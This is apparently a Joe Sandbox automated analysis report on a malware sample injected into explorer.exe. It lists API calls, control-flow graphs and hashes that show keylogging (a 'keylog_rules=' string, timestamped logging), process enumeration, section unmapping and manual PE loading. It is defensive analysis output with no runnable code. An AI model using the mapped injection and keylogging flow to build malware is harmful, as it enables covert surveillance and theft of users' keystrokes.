                                      • Part of subcall function 000C2A09: GetProcessHeap.KERNEL32(00000008,0000A000,000C10BF), ref: 000C2A0C
                                      • Part of subcall function 000C2A09: RtlAllocateHeap.NTDLL(00000000), ref: 000C2A13
                                    • PathMatchSpecA.SHLWAPI(?,00000000), ref: 000C138A
                                      • Part of subcall function 000C2841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,000C1119,00000001), ref: 000C2850
                                      • Part of subcall function 000C2841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,000C1119,00000001), ref: 000C2855
                                    • RtlZeroMemory.NTDLL(00000000,00000104), ref: 000C1316
                                    • RtlMoveMemory.NTDLL(00000000,?,?), ref: 000C1332
                                      • Part of subcall function 000C2569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,000C136E), ref: 000C2591
                                      • Part of subcall function 000C2569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 000C259A
                                    • RtlMoveMemory.NTDLL(00000000,?,?), ref: 000C135F
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                    • String ID:
                                    • API String ID: 2993730741-0
                                    • Opcode ID: 0ac87bd373f8ed99958b6e0c08685b4a8e358e315492f70acb1fa5f8003aaa97
                                    • Instruction ID: d562493719cb4c4e026359440947dc2e3579e3f41aaee4e7071eec4338b3e0d2
                                    • Opcode Fuzzy Hash: 0ac87bd373f8ed99958b6e0c08685b4a8e358e315492f70acb1fa5f8003aaa97
                                    • Instruction Fuzzy Hash: DD217C717042029F8314EF689855EBFB7DAAB85704B10052EF856D3743DB74DE0A8AA2

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 410 c1581-c1592 412 c1598-c159b 410->412 413 c1624-c1628 410->413 414 c159d-c15a0 412->414 415 c15a7-c15b3 GlobalFix 412->415 414->415 416 c15a2-c15a5 414->416 417 c15b5-c15b9 415->417 418 c1623 415->418 416->413 416->415 419 c15e9 417->419 420 c15bb-c15be 417->420 418->413 421 c15eb-c15f2 call c293e 419->421 422 c15e4-c15e7 420->422 423 c15c0-c15c3 420->423 425 c15f4-c15fd call c2724 421->425 422->421 423->425 426 c15c5-c15e2 lstrlenW call c2a09 lstrcatW 423->426 432 c15ff-c1608 lstrlenW 425->432 433 c161b-c1622 GlobalUnWire 425->433 426->425 432->433 434 c160a-c160e 432->434 433->418 435 c160f call c16b9 434->435 436 c1614-c1616 call c29eb 435->436 436->433
                                    APIs
                                    • GlobalFix.KERNEL32(00000000), ref: 000C15A9
                                    • lstrlenW.KERNEL32(00000000), ref: 000C15C6
                                    • lstrcatW.KERNEL32(00000000,00000000), ref: 000C15DC
                                    • lstrlenW.KERNEL32(00000000), ref: 000C1600
                                    • GlobalUnWire.KERNEL32(00000000), ref: 000C161C
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: Globallstrlen$Wirelstrcat
                                    • String ID:
                                    • API String ID: 2993198917-0
                                    • Opcode ID: 459dcb5bd60fc1d6d8a4ec2484561232731dcca1fcf2940ef220a5a8ac2fd769
                                    • Instruction ID: 2927bbd73aaff1188484e355a6f7d029e9883fd6ebc964aa294f47b92abf4417
                                    • Opcode Fuzzy Hash: 459dcb5bd60fc1d6d8a4ec2484561232731dcca1fcf2940ef220a5a8ac2fd769
                                    • Instruction Fuzzy Hash: 9901D673A005119B96A5A7B96CA8FFE72EEDFC7311718812DF907D3223DE388D024251
                                    APIs
                                    • RtlMoveMemory.NTDLL(?,?,?), ref: 000C1BF4
                                    • LoadLibraryA.KERNEL32(?), ref: 000C1C1C
                                    • GetProcAddress.KERNEL32(00000000,-00000002,?,?,00000001,?,00000000), ref: 000C1C49
                                    • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 000C1C9A
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                    • String ID:
                                    • API String ID: 3827878703-0
                                    • Opcode ID: a1fa2897f6eeaaf6418c8c6bd49ed20ebe01f4e3a186c38d30c5220face9fd6a
                                    • Instruction ID: 0f94b4d00775962fd9be86123519ab69dd273243beb291c40cf147945b3728e7
                                    • Opcode Fuzzy Hash: a1fa2897f6eeaaf6418c8c6bd49ed20ebe01f4e3a186c38d30c5220face9fd6a
                                    • Instruction Fuzzy Hash: 2931A072644216AFCB68CF29C8C5FAAB7E8BF16314B14812CF846C7202D735E855CBA0
                                    APIs
                                    • RtlEnterCriticalSection.NTDLL(000C582C), ref: 000C1839
                                    • lstrlenW.KERNEL32 ref: 000C1845
                                    • RtlLeaveCriticalSection.NTDLL(000C582C), ref: 000C18A9
                                    • Sleep.KERNEL32(00007530), ref: 000C18B4
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                    • String ID:
                                    • API String ID: 2134730579-0
                                    • Opcode ID: b7ca6529636f7f8254d03c94504c304348deab3eeb00a526b83db2b0e62c9f6f
                                    • Instruction ID: 3834de6056902f887f9ecd6d137a752c8a98f7cf684a6e0de9bd4c27b350f12c
                                    • Opcode Fuzzy Hash: b7ca6529636f7f8254d03c94504c304348deab3eeb00a526b83db2b0e62c9f6f
                                    • Instruction Fuzzy Hash: F501DB75514900EBE314A765EC1AEBF3AA9EF42701720401CF401D72A3DE38DD05D7A2
                                    APIs
                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,000C11DD), ref: 000C26DB
                                    • IsWow64Process.KERNEL32(000000FF,?), ref: 000C26ED
                                    • IsWow64Process.KERNEL32(00000000,?), ref: 000C2700
                                    • CloseHandle.KERNEL32(00000000), ref: 000C2716
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: Process$Wow64$CloseHandleOpen
                                    • String ID:
                                    • API String ID: 331459951-0
                                    • Opcode ID: 02297c31019684d447ac4339689d1bc2c5ca3f6844345d9c4ad04b586d5aaf51
                                    • Instruction ID: 8543e8021ad4659119aa57ca7a68f514f5d5e7197e66a885c8417ef43d17e97b
                                    • Opcode Fuzzy Hash: 02297c31019684d447ac4339689d1bc2c5ca3f6844345d9c4ad04b586d5aaf51
                                    • Instruction Fuzzy Hash: EDF0B472816218FFAB10CFA0AD88DEEB7BCEF05351B20436EE90493540D7344F0096A1
                                    APIs
                                      • Part of subcall function 000C2A09: GetProcessHeap.KERNEL32(00000008,0000A000,000C10BF), ref: 000C2A0C
                                      • Part of subcall function 000C2A09: RtlAllocateHeap.NTDLL(00000000), ref: 000C2A13
                                    • GetLocalTime.KERNEL32(?,00000000), ref: 000C17F3
                                    • wsprintfW.USER32 ref: 000C181D
                                    Strings
                                    • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 000C1817
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.605313195.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_c1000_explorer.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                    • API String ID: 377395780-613334611
                                    • Opcode ID: 379196f9af00695f8a59d988b2b225ed8e44fa6729e6e404bb9aa1f661145cb5
                                    • Instruction ID: fc756d089e7f805dcc5fcce9bd6ebdc4614374d7682bf0dbb65d2506be8e73c4
                                    • Opcode Fuzzy Hash: 379196f9af00695f8a59d988b2b225ed8e44fa6729e6e404bb9aa1f661145cb5
                                    • Instruction Fuzzy Hash: 16F03072910128BA9714ABDA9C05DFFB2FCEB0CB02B00018AFE41E1181E67D5A50D3B5

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_0006B007 1 Function_00061D04 2 Function_00062A04 25 Function_00062918 2->25 44 Function_000627C4 2->44 66 Function_00061C6C 2->66 3 Function_00061405 4 Function_00062580 5 Function_00061F00 6 Function_00061000 7 Function_0006AD00 8 Function_0006A881 9 Function_0006428F 10 Function_0006370C 10->10 32 Function_000631AC 10->32 42 Function_00061838 10->42 43 Function_000634C4 10->43 10->66 11 Function_0006188C 11->42 12 Function_00061F0C 13 Function_0006AC8D 14 Function_00061508 15 Function_00061A88 16 Function_00062D14 20 Function_00061E1C 16->20 40 Function_000624B8 16->40 16->42 63 Function_00061860 16->63 70 Function_000618E8 16->70 17 Function_00063394 17->15 21 Function_00061E9C 17->21 17->42 55 Function_000618D0 17->55 17->63 17->70 80 Function_00061EF8 17->80 18 Function_00061B10 19 Function_0006B291 20->42 22 Function_0006AB9C 23 Function_0006141D 24 Function_00064298 26 Function_00061D24 27 Function_00061822 28 Function_000627A0 29 Function_00061CAC 30 Function_000620AC 30->15 31 Function_00062E2C 31->11 45 Function_00062DC0 31->45 31->63 32->18 33 Function_000625A8 32->33 32->42 53 Function_00061D54 32->53 32->63 79 Function_000626F8 32->79 33->4 33->55 69 Function_00062768 33->69 34 Function_0006B4A8 68 Function_0006B46A 34->68 35 Function_000614B2 36 Function_0006AAB0 37 Function_0006B2BE 37->34 38 Function_000619BC 39 Function_00062FBC 39->31 40->42 40->63 75 Function_000620F4 40->75 41 Function_00061938 41->42 41->63 43->1 43->2 43->15 43->17 43->26 43->29 43->38 43->42 47 Function_00061C4C 43->47 43->63 43->66 77 Function_00061BF8 43->77 45->42 46 Function_0006ABCF 48 Function_0006C14A 49 Function_0006B148 50 Function_0006ABD7 51 Function_00061254 52 Function_000614D4 54 Function_0006AAD2 56 Function_0006B2DF 57 Function_00061FDC 57->42 78 Function_000618F8 57->78 58 Function_0006B15B 59 Function_00063158 60 Function_0006B358 60->34 61 Function_00062664 62 Function_0006AFE3 63->66 64 Function_00061560 65 Function_0006156C 67 Function_0006ADEA 69->28 71 Function_00063068 71->31 71->41 71->42 71->63 71->66 72 Function_0006A8E8 73 Function_00061576 74 Function_0006AFF6 75->11 75->12 75->30 75->38 75->42 75->55 75->57 75->63 75->78 76 Function_00061EFA 79->4 79->61 79->66 81 Function_000614F9 82 Function_00065579

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 113 6370c-6371c call 61c6c 116 63722-63754 call 61838 113->116 117 637b0-637b5 113->117 121 63756-6375b call 61838 116->121 122 63785-637aa NtUnmapViewOfSection 116->122 124 63760-63779 121->124 126 637bc-637cb call 634c4 122->126 127 637ac-637ae 122->127 124->122 133 637d5-637de 126->133 134 637cd-637d0 call 6370c 126->134 127->117 128 637b6-637bb call 631ac 127->128 128->126 134->133
                                    APIs
                                    • NtUnmapViewOfSection.NTDLL ref: 0006378C
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.605252285.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_61000_explorer.jbxd
                                    Similarity
                                    • API ID: SectionUnmapView
                                    • String ID:
                                    • API String ID: 498011366-0
                                    • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                    • Instruction ID: 6f86dcd5657ea9ef3a129f1321056eeef28fe10e10ecd7700be2daa8a1f1615e
                                    • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                    • Instruction Fuzzy Hash: 9611C8746069094FFB6CFBB8989D3B533D3FB14312F544029E815C72A2DE398A818740

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00061BF8: OpenFileMappingA.KERNEL32 ref: 00061C0F
                                      • Part of subcall function 00061BF8: MapViewOfFile.KERNEL32 ref: 00061C2E
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 000635B7
                                    • Process32First.KERNEL32 ref: 000635DA
                                    • lstrcmpi.KERNEL32 ref: 0006360C
                                    • Process32Next.KERNEL32 ref: 000636CD
                                    • CloseHandle.KERNELBASE ref: 000636DE
                                    • SysFreeMap.PGOCR ref: 000636F7
                                    • SleepEx.KERNEL32 ref: 00063701
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.605252285.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_61000_explorer.jbxd
                                    Similarity
                                    • API ID: FileProcess32$CloseCreateFirstFreeHandleMappingNextOpenSleepSnapshotToolhelp32Viewlstrcmpi
                                    • String ID:
                                    • API String ID: 3402289966-0
                                    • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                    • Instruction ID: e861ec5d46096bab29741ff2dd44a154c76200efb4f374e95dae1c26c01eb10d
                                    • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                    • Instruction Fuzzy Hash: 68517730218A089FDB59FF68D8996EA73E3EB94310F444619F45BC72A2DF78DA0587C1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 54 6b4a8-6b4ab 55 6b4b5-6b4b9 54->55 56 6b4c5 55->56 57 6b4bb-6b4c3 55->57 58 6b4c7 56->58 59 6b4ad-6b4b3 56->59 57->56 60 6b4ca-6b4d1 58->60 59->55 62 6b4d3-6b4db 60->62 63 6b4dd 60->63 62->63 63->60 64 6b4df-6b4e2 63->64 65 6b4f7-6b504 64->65 66 6b4e4-6b4f2 64->66 76 6b506-6b508 65->76 77 6b51e-6b52c call 6b46a 65->77 67 6b4f4-6b4f5 66->67 68 6b52e-6b549 66->68 67->65 69 6b57a-6b57d 68->69 71 6b582-6b589 69->71 72 6b57f-6b580 69->72 75 6b58f-6b593 71->75 74 6b561-6b565 72->74 78 6b567-6b56a 74->78 79 6b54b-6b54e 74->79 80 6b595-6b5ae LoadLibraryA 75->80 81 6b5f0-6b5f9 75->81 84 6b50b-6b512 76->84 77->55 78->71 85 6b56c-6b570 78->85 79->71 83 6b550 79->83 82 6b5af-6b5b6 80->82 86 6b5fc-6b605 81->86 82->75 89 6b5b8 82->89 90 6b551-6b555 83->90 104 6b514-6b51a 84->104 105 6b51c 84->105 85->90 91 6b572-6b579 85->91 92 6b607-6b609 86->92 93 6b62a-6b67a VirtualProtect * 2 86->93 94 6b5c4-6b5cc 89->94 95 6b5ba-6b5c2 89->95 90->74 96 6b557-6b559 90->96 91->69 98 6b61c-6b628 92->98 99 6b60b-6b61a 92->99 100 6b67e-6b683 93->100 102 6b5ce-6b5da 94->102 95->102 96->74 103 6b55b-6b55f 96->103 98->99 99->86 100->100 101 6b685-6b694 100->101 108 6b5e5-6b5ef 102->108 109 6b5dc-6b5e3 102->109 103->74 103->78 104->105 105->77 105->84 109->82
                                    APIs
                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,7473604B), ref: 0006B5A7
                                    • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006B651
                                    • VirtualProtect.KERNELBASE ref: 0006B66F
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.605252285.000000000006A000.00000040.80000000.00040000.00000000.sdmp, Offset: 0006A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_6a000_explorer.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual$LibraryLoad
                                    • String ID:
                                    • API String ID: 895956442-0
                                    • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                    • Instruction ID: de7da5a6e30cfdee21bae1f1aab1ff707d31be70e42097908793e0bf60735bc1
                                    • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                    • Instruction Fuzzy Hash: C1514772758D1D4BCB24AA7C9C843F8B7D3FB55325B58062AD49BC3285EB58C9C68381

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 110 61bf8-61c18 OpenFileMappingA 111 61c1a-61c38 MapViewOfFile 110->111 112 61c3b-61c48 110->112 111->112
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.605252285.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_61000_explorer.jbxd
                                    Similarity
                                    • API ID: File$MappingOpenView
                                    • String ID:
                                    • API String ID: 3439327939-0
                                    • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                    • Instruction ID: 3bcaf25acfd1f49024d9787d5b89c15f37bef9fb8d047487d34edab0d4ccc7e8
                                    • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                    • Instruction Fuzzy Hash: 0FF01234314F4D4FEB45EF7C9C9C135B7E1EBA8202744857A985AC6165EF34C8458711